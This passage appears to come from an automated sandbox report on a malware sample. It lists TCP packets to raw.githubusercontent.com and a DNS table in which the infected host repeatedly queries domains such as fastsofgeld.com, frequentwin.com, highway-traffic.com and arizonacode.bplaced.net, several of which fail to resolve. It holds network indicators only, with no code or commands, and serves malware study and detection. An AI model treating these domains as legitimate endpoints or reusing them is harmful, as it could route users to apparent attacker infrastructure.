                                                                                                                                                            Sep 29, 2022 14:45:15.169281006 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.169472933 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.169481039 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.169497013 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.169562101 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.169615984 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.178425074 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.178447962 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.178582907 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.178764105 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.178771973 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.178786993 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.178867102 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.178930044 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.179902077 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.179919004 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.180071115 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.180309057 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.180327892 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.180346012 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.180437088 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.180722952 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.181021929 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.181046009 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.181169987 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.181457996 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.181469917 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.181488991 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.181571960 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.181631088 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.182224035 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.182240009 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.182349920 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.182667971 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.183370113 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.203432083 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.203476906 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.203605890 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.203623056 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.203665018 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.204000950 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204030037 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204077959 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.204090118 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204104900 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.204123020 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.204199076 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204231977 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204257965 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.204267025 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204291105 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.204305887 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.204356909 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204379082 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204440117 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204459906 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.204469919 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204497099 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204518080 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.204529047 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204560041 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.204592943 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.204757929 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204786062 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204819918 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.204828978 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.204854012 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.204868078 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.205022097 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.205049038 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.205080986 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.205091000 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.205116034 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.205128908 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.205180883 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.205207109 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.205231905 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.205240011 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.205261946 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.205276012 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.205312967 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.205334902 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.205364943 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.205374002 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.205387115 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.205404043 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.207103014 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.207484961 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.215945959 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.215982914 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.216140032 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.216156960 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.216202021 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.216686964 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.216717005 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.216758966 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.216770887 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.216783047 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.216799021 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.216928005 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.216952085 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.216981888 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.216990948 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.217011929 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.217027903 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.217093945 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.217118025 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.217152119 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.217159986 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.217189074 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.217211962 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.217221975 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.217236042 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.217266083 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.217278004 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.217288017 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.217341900 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.217453003 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.217477083 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.217503071 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.217514992 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.217535973 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.217576981 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.217729092 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.218043089 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.218070984 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.218122005 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.218132973 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.218144894 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.218228102 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.218257904 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.218286991 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.218296051 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.218317032 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.218365908 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.218386889 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.218411922 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.218422890 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.218442917 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.218466997 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.218651056 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.219278097 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.219310045 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.219356060 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.219373941 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.219389915 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.219762087 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.219791889 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.219820023 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.219832897 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.219846964 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.219950914 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.219974041 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.220000029 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.220009089 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.220062971 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.220076084 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.220084906 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.220107079 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            Sep 29, 2022 14:45:15.220128059 CEST44349756185.199.110.133192.168.2.6
                                                                                                                                                            Sep 29, 2022 14:45:15.220174074 CEST49756443192.168.2.6185.199.110.133
                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Sep 29, 2022 14:44:42.077786922 CEST192.168.2.68.8.8.80x12b8Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:44:42.679819107 CEST192.168.2.68.8.8.80x66ccStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:06.285187960 CEST192.168.2.68.8.8.80x6e0fStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:06.565529108 CEST192.168.2.68.8.8.80xa501Standard query (0)searchdusty.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:09.034399033 CEST192.168.2.68.8.8.80x9b8cStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:09.258827925 CEST192.168.2.68.8.8.80xeec5Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:12.374439001 CEST192.168.2.68.8.8.80xcb73Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:14.354074955 CEST192.168.2.68.8.8.80x2a1aStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:14.419563055 CEST192.168.2.68.8.8.80xe892Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:14.727221966 CEST192.168.2.68.8.8.80x682eStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:17.008261919 CEST192.168.2.68.8.8.80x3f90Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:17.058190107 CEST192.168.2.68.8.8.80x9f8cStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:17.061350107 CEST192.168.2.68.8.8.80x828cStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:17.729552984 CEST192.168.2.68.8.8.80x92c2Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:19.733782053 CEST192.168.2.68.8.8.80xdfaeStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:19.790982008 CEST192.168.2.68.8.8.80xb61cStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:21.418555975 CEST192.168.2.68.8.8.80xd9f7Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:26.870524883 CEST192.168.2.68.8.8.80xdc65Standard query (0)www.vikingwebscanner.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:38.739653111 CEST192.168.2.68.8.8.80x34aStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:54.057667017 CEST192.168.2.68.8.8.80x1c2bStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:54.476136923 CEST192.168.2.68.8.8.80xc24fStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:57.736270905 CEST192.168.2.68.8.8.80xfa02Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:02.889060974 CEST192.168.2.68.8.8.80x945cStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:03.128825903 CEST192.168.2.68.8.8.80xc12Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:03.260593891 CEST192.168.2.68.8.8.80x253Standard query (0)yandex.ruA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:03.260819912 CEST192.168.2.68.8.8.80xbe24Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:04.913929939 CEST192.168.2.68.8.8.80xa2e2Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:12.519229889 CEST192.168.2.68.8.8.80xb890Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:12.763290882 CEST192.168.2.68.8.8.80x2927Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:14.857574940 CEST192.168.2.68.8.8.80x6b75Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:15.903273106 CEST192.168.2.68.8.8.80xa3fcStandard query (0)arizonacode.bplaced.netA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:16.426163912 CEST192.168.2.68.8.8.80x1200Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:20.882215023 CEST192.168.2.68.8.8.80xe43aStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:20.889375925 CEST192.168.2.68.8.8.80x8f06Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:21.423317909 CEST192.168.2.68.8.8.80x574Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:23.469985962 CEST192.168.2.68.8.8.80xde82Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:24.529366970 CEST192.168.2.68.8.8.80xcb28Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:34.131911039 CEST192.168.2.68.8.8.80x417fStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:34.451395035 CEST192.168.2.68.8.8.80xdbecStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:36.011198997 CEST192.168.2.68.8.8.80x999bStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:36.681777000 CEST192.168.2.68.8.8.80xd2d7Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:36.683350086 CEST192.168.2.68.8.8.80x229eStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:36.706150055 CEST192.168.2.68.8.8.80x7da8Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:36.889986038 CEST192.168.2.68.8.8.80x60cStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:38.300327063 CEST192.168.2.68.8.8.80x6bc6Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:38.499073982 CEST192.168.2.68.8.8.80xb218Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:38.806009054 CEST192.168.2.68.8.8.80x3df2Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:39.342680931 CEST192.168.2.68.8.8.80x75Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:39.822223902 CEST192.168.2.68.8.8.80x6df5Standard query (0)www.vikingwebscanner.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:39.829531908 CEST192.168.2.68.8.8.80x3002Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:39.903678894 CEST192.168.2.68.8.8.80xcd25Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:40.965372086 CEST192.168.2.68.8.8.80x637Standard query (0)arizonacode.bplaced.netA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:41.103290081 CEST192.168.2.68.8.8.80x1ee8Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:43.561847925 CEST192.168.2.68.8.8.80x7bfStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:44.122910023 CEST192.168.2.68.8.8.80x604dStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:46.394402027 CEST192.168.2.68.8.8.80xd06aStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:47:46.843512058 CEST192.168.2.68.8.8.80x70Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:00.310101986 CEST192.168.2.68.8.8.80x67d7Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:00.334079981 CEST192.168.2.68.8.8.80x63fStandard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:01.157205105 CEST192.168.2.68.8.8.80xac92Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:01.809530973 CEST192.168.2.68.8.8.80x3eabStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:06.739763021 CEST192.168.2.68.8.8.80x6ed5Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:07.760879993 CEST192.168.2.68.8.8.80x2f5aStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:07.787463903 CEST192.168.2.68.8.8.80xdd33Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:08.976974964 CEST192.168.2.68.8.8.80x23ceStandard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:16.074443102 CEST192.168.2.68.8.8.80x8ff8Standard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:16.122679949 CEST192.168.2.68.8.8.80xe05bStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:16.872342110 CEST192.168.2.68.8.8.80x2c41Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:23.264013052 CEST192.168.2.68.8.8.80x7fa5Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:48:29.054258108 CEST192.168.2.68.8.8.80xcaeeStandard query (0)google.ruA (IP address)IN (0x0001)false
                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Sep 29, 2022 14:44:42.099726915 CEST8.8.8.8192.168.2.60x12b8No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:44:42.698648930 CEST8.8.8.8192.168.2.60x66ccNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:44:42.698648930 CEST8.8.8.8192.168.2.60x66ccNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:44:42.698648930 CEST8.8.8.8192.168.2.60x66ccNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:44:42.698648930 CEST8.8.8.8192.168.2.60x66ccNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:06.307041883 CEST8.8.8.8192.168.2.60x6e0fName error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:06.595041037 CEST8.8.8.8192.168.2.60xa501No error (0)searchdusty.com37.187.79.168A (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:09.065455914 CEST8.8.8.8192.168.2.60x9b8cName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:09.280605078 CEST8.8.8.8192.168.2.60xeec5Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:12.395347118 CEST8.8.8.8192.168.2.60xcb73Name error (3)fastsofgeld.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:14.376315117 CEST8.8.8.8192.168.2.60x2a1aName error (3)frequentwin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Sep 29, 2022 14:46:14.440886021 CEST8.8.8.8192.168.2.60xe892Name error (3)highway-traffic.comnonenoneA (IP address)IN (0x0001)false
